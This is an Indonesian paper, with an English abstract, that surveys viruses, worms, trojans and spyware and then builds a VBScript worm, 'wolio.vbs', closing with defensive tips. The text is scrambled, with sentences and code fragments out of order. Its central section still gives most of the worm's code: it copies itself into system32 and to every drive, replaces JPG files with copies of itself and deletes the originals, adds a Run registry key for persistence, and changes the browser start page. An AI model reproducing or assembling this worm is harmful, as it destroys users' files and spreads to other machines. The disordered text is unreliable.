You are on page 1of 11

ABSTRACT

A computer virus is a computer program that can copy itself and infect a computer
without permission or knowledge of the user. However, the term "virus" is
commonly used, albeit erroneously, to refer to many different types of malware
programs. The original virus may modify the copies, or the copies may modify
themselves, as occurs in a metamorphic virus. A virus can only spread from one
computer to another when its host is taken to the uninfected computer, for instance
by a user sending it over a network or the Internet, or by carrying it on a
removable medium such as a floppy disk, CD, or USB drive. Meanwhile viruses
can spread to other computers by infecting files on a network file system or a file
system that is accessed by another computer. Viruses are sometimes confused with
computer worms and Trojan horses. A worm can spread itself to other computers
without needing to be transferred as part of a host, and a Trojan horse is a file
that appears harmless. Both worms and Trojans will cause harm to computers
when executed.

Some viruses are programmed to damage the computer by damaging programs,
deleting files, or reformatting the hard disk. Others are not designed to do any
damage, but simply replicate themselves and perhaps make their presence known
by presenting text, video, or audio messages. Even these begins viruses can create
problems for the computer user. They typically take up computer memory used by
legitimate programs. As a result, they often cause erratic behavior and can result
in system crashes. In addition, many viruses are bug-ridden, and these bugs may
lead to system crashes and data loss.

Keywords : computer virus, worm, trojan horse, malware

I. PENDAHULUAN

Belakangan ini sering sekali kita mendengar tantang istilah virus komputer.
Tetapi saat ini masih banyak masyarakat yang belum mengerti tentang cara kerja
virus komputer itu sendiri. Dengan mengetahui teknik pembuatan dan penyebaran
virus komputer maka nantinya diharapkan kita semua dapat terhindar dari
kerusakan dan kerugian yang diakibatkan oleh virus komputer.

Berusaha mempertahankan existensi dirinya Saat ini virus komputer dikelompokkan menjadi beberapa jenis antara lain: 1. Mempercepat proses penyebarannya melalui media pertukaran data dan informasi 5. Saat ini Virus Komputer hanya dapat merusak perangkat lunak komputer dan tidak dapat secara langsung merusak perangkat keras. Menyebarkan dirinya melalui media file executable 4. Virus komputer dapat merusak. Efek gangguan dari virus komputer ini adalah dapat memperbanyak dirinya sendiri pada saat komputer bekerja. 7. file executable serta mengganggu sistim kerja komputer. OS/2 IBM dan Sun Operating System. Mempercepat proses penyebarannya dengan pendekatan social engineering 8. Sebuah computer worm juga dapat menyebar melalui jaringan komputer atau jaringan internet.Virus komputer merupakan sebuah program komputer yang dapat menggandakan diri atau menyalin dirinya dan menyebar dengan menyisipkan atau membuat salinan dirinya pada dokumen atau berkas lain. Menyembunyikan prosesnya dari pemakai 2. . sehingga sumber daya komputer menjadi berkurang. Mempercepat penyebarannya dengan memanfaatkan kelemahan dari suatu system 6. 2% virus komputer menyerang sistim operasi Linux . Computer worm (cacing komputer) adalah sebuah program yang dapat menyebarkan dirinya didalam banyak komputer dengan cara menggandakan dirinya kedalam setiap memory komputer yang telah terinfeksi. misalnya merusak sebuah file dokumen word. Mengaktifkan dirinya setiap startup sistem 3. Saat ini hampir 95% virus komputer menyerang sistim operasi Windows. sebanyak 1% menyerang sistim operasi Mac dan sisanya sebanyak 2% virus komputer menyerang sistim operasi lain seperti FreeBSD. Sebuah program komputer dapat dikatakan sebagai virus komputer jika memenuhi kriteria sebagai berikut: 1. Menyebarkan dirinya dengan filename spoofing.

yaitu pada file cscript. Hal yang akan dilakukan oleh virus komputer yang akan dibuat adalah sebagai berikut: 1. 3. Kespo. Back Office. Trojan Horse (kuda troya) adalah sebuah program komputer yang seolah-olah berguna tetapi didalamnya tersembunyi kode-kode yang berbahaya yang biasanya digunakan untuk "mencuri" data pada komputer untuk dikirimkan kepada pembuat trojan horse. Brontok. Dipilihnya Visual Basic Scipt karena interpreter untuk Visual Basic Script ini sudah tersedia pada sistim operasi Windows. Menyerang file gambar JPG . Love Letter. Kebanyakan jenis trojan horse ini tersembunyi pada perangkat lunak yang digunakan untuk crack atau key generator. Nimda. Spyware adalah turunan dari Adware. Yang sering dijadikan target "pencurian" data dari spyware ini adalah address book pada aplikasi Microsoft OutLook yang nantinya akan dikirimkan kepada pembuat spyware. II . Contoh dari beberapa perangkat lunak yang termasuk jenis trojan horse adalah DDoS Trojan. Spyware ini lebih berbahaya karena dapat "mencuri" data kita yang akan dikirimkan kepada pembuatnya. METODE PENELITIAN Setelah mengetahui penjelasan tentang virus komputer maka kita akan mencoba membuat sebuah virus komputer jenis worm dengan menggunakan Visual Basic Script. Adware sebuah perangkat lunak yang dapat menyebarkan informasi berupa iklan pada komputer yang terhubung dalam jaringan internet.Contoh virus komputer yang termasuk jenis ini adalah ADMWorm. 2. Sebelum merancang sebuah virus komputer hal yang pertama kita lakukan adalah merancang terlebih dahulu skenario kerja sebuah virus komputer yang akan dibuat. Adware ini tidak begitu berbahaya tetapi kehadirannya terkadang menggangu para pengguna komputer. Beberapa website yang berisi pornografi sering memanfaatkan adware ini untuk mengiklankan diri.exe yang terletak pada folder c:\windows\system32. Sub Seven dan Passfilt Trojan. karena dapat menuliskan informasi-informasi yang berupa iklan dari pembuat adware pada komputer kita.

drive Mengatur file system object dengan perintah: . regedit. 2. fbackup. preview. Mencari file-file gambar JPG yang ada pada sebuah folder 3. fsource. Menularkan virus pada setiap drive yang aktif termasuk flashdisk 4. HASIL DAN PEMBAHASAN Pertama kali kita terlebih dahulu mendefinisikan macam variabel yang digunakan dengan perintah: on error resume next dim fso. Virus akan aktif setiap kali sistim operasi Microsoft Windows dijalankan 5. myfolder. ftarget. scriptname. Merubah halaman tampilan awal pada browser Internet Explorer agar menuju alamat situs web tertentu Diagram Alur (Flow Chart) dari virus komputer tersebut adalah sebagai berikut: Gambar 1 Diagram Alur Virus III. subfolder. filetarget. sys.

GetFolder(folder).GetFile(Wscript.vbs") Untuk mencari file JPG pada folder tertentu dan menularinya dibuatlah sebuah sub program bernama carifilejpg(myfolder) dan serangan_jpg(target).Shell") Mengambil posisi folder saat ini: myfolder = Left(fsource.ScriptFullName) set regedit=CreateObject("WScript.set fso = CreateObject("Scripting.3)="jpg") then serangan_jpg(filetarget) Next End Sub Sub serangan_jpg(target) on error resume next set ftarget=fso.Copy("c:\windows\system32\wolio.InStrRev(fsource.FileSystemObject") set fsource = fso.Files If (Right(filetarget.ScriptFullName) . Sub carifilejpg(folder) For Each filetarget in fso.GetFile(Wscript.GetFile(target) set fsource = fso."\")) Salin virus pada folder C:\WINDOWS\SYSTEM32\: fsource.

")) & "jpeg") fbackup.Copy(Left(target.")) & "jpg " & ".Attributes = 2 fsource.ftarget. Sub serangan_folder(foldername) on error resume next For Each subfolder in fso.instrrev(target.instrrev(target.Copy(Left(target.SubFolders fsource.vbs") ftarget.GetFile(Left(target.".GetFolder(foldername).Copy(subfolder & "\wolio.vbs") carifilejpg(subfolder) next End Sub Untuk merubah Registry Windows agar virus komputer aktif setiap kali Sistim Operasi Windows dijalankan digunakan perintah : .Close End Sub Untuk menyalin virus ke folder tertentu digunakan sub program serangan_folder(foldername).Delete ftarget.".".Close fsource.")) & "jpeg") set fbackup = fso.instrrev(target.

isready Then fsource.vbs") End If Next End Sub Untuk merubah tampilan awal Internet Explorer agar menuju situs web tertentu dibuatlah sub program serangan_ie() sebagai berikut: .if (regedit. "c:\windows\system32\wolio.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\Current\Version\Run\Wolio")<>"c:\windows\system32\wolio. Sub serangan_drive() Set Drives=fso.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current\Version\Run \Wolio".Copy(drive & "\" & "wolio.drives For Each Drive in Drives If drive.vb s") Then regedit.vbs" End If Langkah berikutnya adalah menyalin virus pada semua drive dibuatlah sub program serangan_drive().

RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page".id") Then regedit. .baubau. KESIMPULAN DAN SARAN a.id" End If End Sub IV. Jadi pada dasarkan untuk menon-aktifkan sebuah virus komputer kita perlu memeriksa bagian Registry Windows tersebut dan memastikan tidak ada program- program yang mencurigakan yang ada pada bagian itu.go. Kesimpulan Berdasarkan pada hasil penelitian dan pembahasan diatas maka kita dapat mengetahui bahwa virus komputer dapat dibuat dengan sangat mudah hanya dengan sedikit pengetahuan bahasa pemrograman tertentu dalam contoh tersebut dibuat sebuah virus komputer yang dibuat dengan menggunakan pemrograman Visual Basic Script.Sub serangan_ie() If (regedit. Pada bagian diatas telah disebutkan bahwa agar virus selalu aktif setiap kali sistim operasi Windows dijalankan maka virus akan merubah Registry Windows pada bagian : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current\Version\Run\ ."http://www.RegRead("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page")<>"http://www.baubau.go.

Folder Options . Saran Berdasarkan pada kesimpulan diatas maka untuk mencegah dan terhindar dari bahaya virus komputer maka dapat dilakukan beberapa cara antara lain: • Periksalah proses yang sedang berjalan pada sistim operasi Windows dengan cara melihat dan mengawasinya dengan "Task Manager" dengan cara menekan tombol Ctrl-Alt-Del secara bersamaan dan klik tab Processes. Periksalah Registry Windows terutama pada bagian : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current\Version\Run\ atau HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current\Version\RunO nce\ Bagian inilah yang selalu digunakan oleh virus komputer untuk aktif pada saat sistim operasi Windows dijalankan. Pada virus komputer yang dibuat kali ini adalah menyerang file-file JPG dan menggantinya dengan program virus.vbs.jpg. b. Jika ada aplikasi yang dirasa mencurigakan kita dapat menghapus aplikasi tersebut dengan cara memilih aplikasi yang dicurigai dan klik tombol "End Process". Jika ada program yang dirasa mencurigakan kita dapat menghapusnya. • Sebaiknya ubahlah pengaturan pada Explorer pada sistim operasi Windows pada bagian Tools . Cara mengelabuhi pemakai dengan teknik double extension yaitu memberikan dua buah ekstensi pada file virus misalkan menjadi filesaya. Karena pada posisi default sistim operasi Windows akan menyembunyikan ekstensi file sehingga pemakai awam menyangka file tersebut bernama filesaya.jpg.Tab View. .

wikipedia.html http://id.org/wiki/Adware http://www.wikipedia.org/wiki/Computer_virus .org/wiki/Brontok http://id. excel atau virus komputer yang dibuat dengan Visual Basic Script sering menggunakan teknik double extensions untuk mengelabuhi pemakai. Pengaturan tersebut digunakan untuk menampilkan file-file yang tersebunyi (hidden) yang biasanya sering dilakukan oleh virus komputer.org/wiki/Worm http://id.com/brontok/analisisbrontok.wikipedia. V.wikipedia.wikipedia. • Sub Hidden files and folders pilihlah Show hidden files and folders.org/wiki/Nobron http://compactbyte.wikipedia.org/wiki/Spyware http://id. misalkan file word. DAFTAR PUSTAKA http://id.org/wiki/Trojan_horse http://id. Sub Hide extensions for known file types jangan diberikan tanda check Pengaturan ini digunakan untuk menghindari "tipuan" dari virus komputer yang menyamar menjadi file tertentu.howstuffworks.htm http://en.com/virus.wikipedia.wikipedia.org/wiki/Virus_komputer http://id.

http://computer.mspx .htm http://computer.microsoft.com/virus3.com/protect/computer/basics/virus.htm http://www.com/virus2.htm http://computer.com/virus1.howstuffworks.howstuffworks.howstuffworks.howstuffworks.htm http://computer.com/virus5.